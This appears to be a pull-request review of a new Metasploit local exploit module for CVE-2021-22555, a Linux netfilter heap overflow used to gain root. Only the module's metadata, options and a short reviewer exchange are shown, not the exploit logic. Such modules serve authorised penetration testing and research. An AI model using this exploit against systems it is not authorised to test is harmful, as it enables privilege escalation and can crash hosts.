modules/exploits/linux/local/netfilter_priv_esc.rb

```diff
@@ -0,0 +1,138 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Local
+  Rank = GreatRanking
+  include Msf::Post::Common
+  prepend Msf::Exploit::Remote::AutoCheck
+  include Msf::Post::Linux::Priv
+  include Msf::Post::Linux::System
+  include Msf::Post::Linux::Kernel
+  include Msf::Post::File
+  include Msf::Exploit::EXE
+  include Msf::Exploit::FileDropper
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name'           => 'Netfilter Privilege Escalation',
+        'Description'    => %q{"
+          A heap out-of-bounds write affecting Linux since v2.6.19-rc1 was discovered in net/netfilter/x_tables.c.
+          This allows an attacker to gain privileges or cause a DoS (via heap memory corruption) through user name space.
+          Kernels up to 5.11 (including) are vulnerable.
+          More information about vulnerable kernels is
+          available at https://nvd.nist.gov/vuln/detail/CVE-2021-22555#vulnConfigurationsArea
+        "},
+        'License'        => MSF_LICENSE,
+        'Author'         =>
+          [
+            'Andy Nguyen (theflow@)', # The original author of this exploit
+            'Szymon Janusz' # The author of this module
+          ],
+        'DisclosureDate' => '2021-07-07', # YYYY-DD-MM. Public disclosure date
+        'Platform'       => 'linux',
+        'Arch'           => [ARCH_X64, ARCH_X86],
+        'SessionTypes'   => ['meterpreter', 'shell', 'shell linux'],
+        'Targets'        =>
+          [
+            ['Automatic', {}]
+          ],
+        'DefaultTarget'  => 0,
+        'Notes' => {
+          'Reliability' => [ UNRELIABLE_SESSION ], # The module could fail to get root sometimes.
+          'Stability' => [ OS_RESOURCE_LOSS ], # After too many failed attempts, the system needs to be restarted.
+          'SideEffects' => [ ]
+        },
+        'References' =>
+          [
+            ['CVE', '2021-22555'],
+            ['URL', 'https://google.github.io/security-research/pocs/linux/cve-2021-22555/writeup.html'],
+            ['URL', 'https://nvd.nist.gov/vuln/detail/CVE-2021-22555'],
+            ['URL', 'https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-22555'],
+            ['URL', 'https://ubuntu.com/security/CVE-2021-22555']
+          ]
+      ))
+
+    register_options(
+      [
+        OptString.new('PAYLOAD_DIR', [true, 'Directory to write persistent payload file.', '/var/tmp'])
+      ]
+    )
+
+    deregister_options('ContextInformationFile', 'WfsDelay')
```

Comment:
Why do we deregister these? 👀

Reply:
I didn't think they were needed for the module. I will put them back in 👍